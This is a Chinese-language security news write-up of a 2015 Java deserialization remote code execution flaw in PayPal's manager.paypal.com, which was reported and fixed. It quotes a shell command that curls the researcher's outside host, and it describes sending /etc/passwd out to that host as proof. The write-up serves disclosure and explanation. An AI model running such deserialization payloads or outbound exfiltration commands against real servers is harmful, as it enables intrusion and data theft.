PayPal远程代码执行漏洞

2015年12月，研究人员在PayPal商业网站中发现了一个严重的漏洞,这个漏洞的存在，使得研究人员可以通过不安全的JAVA反序列化对象，在PayPal的网站服务器上远程使用shell命令，并且获取访问生产数据库的权限。安全人员已经将这个漏洞向PayPal的安全团队报告，这个漏洞随后很快就被解决。

具体细节:

在对PayPal的网站进行安全检测的时候，研究人员被一个不同寻常的附件表单参数“oldForm”所吸引,这个参数在经过base64解码后,看上去比较复杂。

在经过一些研究后，发现这是一个没有任何标记的java序列化对象,它由应用程序处理。这就意味着可以向服务器发送任何现有类别的序列化对象,和“readObject”(或“readResolve”)。如果想利用这个漏洞,需要在“classpath”中找到一个合适的类别,一个可以进行序列化和具有有趣(只是站在开发利用的角度来看)的内置的“readObject”方案。

开发利用:

下载这个工具,然后生成了一个简单的有效负载,并向自己的服务器上通过执行“curl x.s.artsploit.com/paypal”shell命令,发送DNS和HTTP请求:

然后研究人员向程序服务器发送了那个在“oldFormData”参数中的base64加密的有效负载，当来自PayPal网络的请求在NGINX访问日志中出现的时候:

研究人员可以在manager.paypal.com网页服务器上执行任意的操作命令，此外，还可以建立一个后台连接到服务器上，比如，上传和执行一个后门。结果可以获取manager.paypal.com应用程序所使用的生产数据库的访问权限。

取而代之的是,研究人员只是读取“/etc/passwd” 文件,通过把它发送到服务器上,并将它所为漏洞的例证:

研究人员在manager.paypal.com程序中发现许多其他端点，它们同样使用序列化对象,也同样可以被利用。

来源：bobao.360.cn